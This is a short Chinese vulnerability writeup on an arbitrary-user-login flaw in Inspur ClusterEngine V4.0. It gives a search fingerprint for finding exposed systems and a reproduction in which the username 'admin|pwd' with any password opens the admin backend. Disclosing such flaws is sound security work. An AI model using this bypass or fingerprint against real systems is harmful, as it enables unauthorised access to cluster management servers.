浪潮ClusterEngineV4.0 任意用户登录漏洞

漏洞描述

浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限。

漏洞影响

浪潮ClusterEngineV4.0

网络测绘

title=”TSCEV4.0″

漏洞复现

登录页面如下

20240401103933649-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010782.45b467e3_2024-04-01_10-39-16 (1)

USER: admin|pwd
PASS:  任意

成功登陆后台,部分功能是无法使用的

20240401111256160-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125109949.c4a3aade_2024-04-01_11-12-48 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容